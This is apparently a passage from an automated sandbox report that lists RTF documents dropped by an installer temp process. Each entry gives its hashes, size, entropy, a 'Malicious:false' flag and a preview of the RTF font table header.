                                                                                                                                                                                                                                                          MD5:4091E666BD6CCC6971AE0F510870DB42
                                                                                                                                                                                                                                                          SHA1:E21753F9D29706ECCD6371C10A0CE598C80C64D1
                                                                                                                                                                                                                                                          SHA-256:508DC3EFA99E34F0865225A43C9D2554169D4D9C9D1CE5C1CA4FEB41958DE1B5
                                                                                                                                                                                                                                                          SHA-512:C8FCF769BA2F155F8BAF4A9BF3E5D93377191EE7C02BCF5ED9E8158C10BC82B1AB344B9788D1FE81A73C18B0E2E10F0DD69C2C2400216878FA34EEDAAA824709
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):34281
                                                                                                                                                                                                                                                          Entropy (8bit):5.012287301852251
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:2aFkTZ0dW2OTYn/akt0LL32En4leo75Y3kpTBLRA6AlEayv:2aFkA0LL32EhZ/6A9O
                                                                                                                                                                                                                                                          MD5:EDED564ACC58819DE344EDCF72FC398B
                                                                                                                                                                                                                                                          SHA1:5BE5194C6D1F83EB91B5ADC4F165BF49EA393FD1
                                                                                                                                                                                                                                                          SHA-256:A036B3EA04F1F8A0C6DF8948FD2ECE8422AF95438DF6FE40AF14D46C457C387A
                                                                                                                                                                                                                                                          SHA-512:3AC8B47B305149067386772E289302033EAB223D1C1B64474268B6DE8BE444377640BCB0F852DA53FBC0B7B17F71EA84AA2CA360F9D6CB938C502B1F689A9B7F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050203
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):59300
                                                                                                                                                                                                                                                          Entropy (8bit):4.973759890149894
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqe+2VXLcpErLVYZx1M8j5g5V5V5h5G5P5N5hBcqtqYepAkVZEdvI9TMMf4fPOj/:qqqcshf4fH6IA9h
                                                                                                                                                                                                                                                          MD5:00483C12EB7B2424B5A2C264DBFBAD6F
                                                                                                                                                                                                                                                          SHA1:3038291DC4B40B6C269A24727F175504F09DD532
                                                                                                                                                                                                                                                          SHA-256:BC9B42D7D66A88398A3FFEAB5790818CCB2DF9FA4B24FC8524F86F23930A8ED4
                                                                                                                                                                                                                                                          SHA-512:04B58420762D90E1564AB6635B718FA47CB71795B743CC42FBC7B54B01D6243083C39A99B9A276F9290BC7FC4989AE0970DB35DBDBAAC92E9B80B69FBEC71693
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\f
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43030
                                                                                                                                                                                                                                                          Entropy (8bit):5.037181036721856
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqel4jeXCpMF2njX8x3JLjwUtqYepjRBcnjX8x3TRbyqfVHVU3icdXPIZnZ/6A9C:qq3pDIA9C
                                                                                                                                                                                                                                                          MD5:67B098FD7DC727E81D9D9FB9A520E1CE
                                                                                                                                                                                                                                                          SHA1:F6D0526FD0E5F10956988840D866DD2222ABF783
                                                                                                                                                                                                                                                          SHA-256:C3AF56E516BBA805D97730CC1303C32539C72A4E93F598F599EE4DE1756AB0BF
                                                                                                                                                                                                                                                          SHA-512:65718F4601D9636CE73B3B5D2E5EDC62B34DAE818C7450033BEC2221916E8AC81316D6EB3F3690186E3A505F82192A4C1EE34D12606690B3B266A2BEDE2F7DEA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\f
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):61781
                                                                                                                                                                                                                                                          Entropy (8bit):4.857520301127485
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2aTIM0LDyaeOsDvEpd1rTmMYm7JRFOtf1SPuJtxLs2coKPvZZ0Z/6A97:2asMQwPIA97
                                                                                                                                                                                                                                                          MD5:78E67BA68FD674E528877B2C4ED0EA13
                                                                                                                                                                                                                                                          SHA1:2393978ADD7BA637E654A9FDB1815BB2D4000BE2
                                                                                                                                                                                                                                                          SHA-256:E023BDA87BC91024BDF8117E2E8FD19628ED0006DF399033A1FDF0A261CD90F8
                                                                                                                                                                                                                                                          SHA-512:D3306182B95C93CB4DDDD7219239F8F927EDD1BF5F3134B89E19637760B8E3F051EBA9ED8EC193CA31D04FDFF2FD75AF6A3F119C357E244DCD7DB151B8061753
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f39\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial CYR;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 0202060305040502
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44589
                                                                                                                                                                                                                                                          Entropy (8bit):5.042107887527953
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqXqx1fDCcJJrNgVVhGPNhHwGNjm+epnBBbq1FkSkek9kukBkrkSkP9MkSI6Ioum:qq4ABXIA9N
                                                                                                                                                                                                                                                          MD5:A408ECED60101314102C175C7FE3E9D7
                                                                                                                                                                                                                                                          SHA1:EBD937ECBFE7FDCC84DF27E7AEED4AC53FAA488A
                                                                                                                                                                                                                                                          SHA-256:2649AAF142678E0D5B5DBEEC454E5D04DD191CE636F6EC5231A7A633C754252C
                                                                                                                                                                                                                                                          SHA-512:B5E5B24DAF9BB0EC263E37AB11B1A66F50C3C4742F3EDB674AEF6FCA8B1F1C566D2F5CF59C9CA95779C9D055CC58B80770B9374EE605D110312F0C6E761E0BA0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panos
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):53477
                                                                                                                                                                                                                                                          Entropy (8bit):4.993468879548167
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4eDwJeLCdAT2njX8x3l7G5V5V5h5G5P5N58UkbdSLVMVIs2TFDtyZ12TXW++xUu:q4ZVFIA9b
                                                                                                                                                                                                                                                          MD5:E70B7387C930D96F979C15DEF4A0EF82
                                                                                                                                                                                                                                                          SHA1:9885403B2230DB0BC89F6C12A5326C28DD5C0ABB
                                                                                                                                                                                                                                                          SHA-256:2ECA499E76C966798F73BFF750D868951A1F337854402446D060919F2D10CE87
                                                                                                                                                                                                                                                          SHA-512:D37DA2B1EBF5808CBBE89163FDEEBB96E842F5FD3CC4A7523F478CA1433BF1F826F44EB219E397F8A427B4884A1987BF435D19F5C809BD06B1E7600E4FD5980C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):54989
                                                                                                                                                                                                                                                          Entropy (8bit):5.004403089561587
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:1536:2aqAse39REjyW0ywGa2eI9Cj+uFECVCjuizCaIizg8zku0+zkuQPChJsCGJ7CdJ+:2B/i+uFEwmuizbIizg8zku0+zkugsGLZ
                                                                                                                                                                                                                                                          MD5:D8DFDDE0D2E5EE7768A3D91D9CD9D014
                                                                                                                                                                                                                                                          SHA1:4C1B8C8205715F8858FA089D887D2A49DC89EC77
                                                                                                                                                                                                                                                          SHA-256:E3409500600560293AC4C89EE3FFB02B854E9CE26926C9C592DB11979288C0BA
                                                                                                                                                                                                                                                          SHA-512:161A64A5B4F8C877661DE001A5293831D351E5294AF76F66441B6DF13AAF5976506ADD1A17F0EAE5126B72F1096AE9A745F1042BD6F9D0AA880F24C726027DF9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050203
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42635
                                                                                                                                                                                                                                                          Entropy (8bit):5.046553170453071
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqXqx1fDCcJJrNgVVhGPNhHwGNjm+epb/Vbc9DuUoU8Gmgflx6Z5zZ/6A9t:qq4e/DIA9t
                                                                                                                                                                                                                                                          MD5:60B7129A13E0CE865F60703FC49D7E1D
                                                                                                                                                                                                                                                          SHA1:96BDB21054BEE9F42FEF53360847FCE57AE3269B
                                                                                                                                                                                                                                                          SHA-256:C68038C41212344C10D0194438D8BF503F3CAB8ED9AEA1B24E91EF989CC14923
                                                                                                                                                                                                                                                          SHA-512:022BCBD14748D9C947F7B93EAC6D38D59F5BD39DFF22E62E16F1C5EC6FEF50BECA4AADE8CFBF745AF7055CEEB91F3DBB7D42117FADBE7149F627262E9654C66C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panos
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):50965
                                                                                                                                                                                                                                                          Entropy (8bit):4.9704278921640555
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2aFkzOc7cskl/VGGAf+E2aiImsQZ/6A91:2aqz+aGIA91
                                                                                                                                                                                                                                                          MD5:B4BB6B054B4A31DE24E87AC030375781
                                                                                                                                                                                                                                                          SHA1:9DFAB2ACC25BA7B468C695E26B953D3E51987121
                                                                                                                                                                                                                                                          SHA-256:B9AB1C6AC6061D9912ACFDF1499C8F4A22D92F950B27BE87BE7B4E0C631EA193
                                                                                                                                                                                                                                                          SHA-512:39CC26F5008F356B8C30551E4B425BCF180662159A308846CD605A5B82E215C63CF5EAEB7A44996E4C39942DDB47FD30AEAF116B671DEA5073E906355244FE2C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050203
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42713
                                                                                                                                                                                                                                                          Entropy (8bit):5.047774415882159
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqXqx1fDCcJJrNgVVhGPNhHwGNjm+epbPybO9FO0I0cmG8/FRaZHIZ/6A95:qq4ePXIA95
                                                                                                                                                                                                                                                          MD5:FC56B09D7F10AE95E575F472B2CE9AB8
                                                                                                                                                                                                                                                          SHA1:806D290A16EE633A1D79B8D916FE00D508ECD51D
                                                                                                                                                                                                                                                          SHA-256:75B89487ADE95BD0450DA43B8978AB7E37AD22CAA7DEDCB9D599EEA0EE0E8A04
                                                                                                                                                                                                                                                          SHA-512:7B0948BCE8EE5AC36E7C91D3405F041973B6F9A6D316E64454E9E6A3B2A316CF65C03D1CE7041B9DD5FBEA3F94F175138735336D71CA927FB68D66D92413CC2C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panos
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43270
                                                                                                                                                                                                                                                          Entropy (8bit):5.005983710564955
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:2aFkyWNdW2OTYn/akJOc7jgskl7rVGGH249LYeoYGEovrMoQJhYNgDPsKknWeo7L:2aFk9Oc7cskl/VGGW+2/Z/6A92
                                                                                                                                                                                                                                                          MD5:4AF18EE9439DF76D12E065E6AA400E6F
                                                                                                                                                                                                                                                          SHA1:B9B939259BD0012DDF6A025199CB670F7B3C0CCE
                                                                                                                                                                                                                                                          SHA-256:DF734E3254D106D22C2C57D81E1C8BA28DAB721488DBB48930516B94948A19DF
                                                                                                                                                                                                                                                          SHA-512:80534BA7923F78792211AF00922D7B9E15A4FB25BF1661353BE820690EF3CDED245AC9BC951CF2BC6F48D8B9C5315DDE74DA9FC2CB8BE097ADECC3BE3EA07270
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050203
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):45355
                                                                                                                                                                                                                                                          Entropy (8bit):5.032998271538751
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqeXxd/1Ca9DGi3w2EHnT2njX8x3FXbv4CD5klkhuhr7RVRatot7kzkAkqkVk2gJ:qqoC8IA9E
                                                                                                                                                                                                                                                          MD5:37B0C0E48F0AF77161430D5DE894A950
                                                                                                                                                                                                                                                          SHA1:9D27E00A6B141CA123DA1E9E0C7C768CB89910E0
                                                                                                                                                                                                                                                          SHA-256:61FCA2437288DDC4692FE93CCE90C3C72C0ADDBD08C5662F391F6EF694B27256
                                                                                                                                                                                                                                                          SHA-512:AC5463F888305FA6BBAB57CA80570B51249A2719C8A1B116B4EB574EEB2D724718CC676092CEA9241F3B72C2B2D0C63137553A7CE4DD8A871ED46E37D63FFEC1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
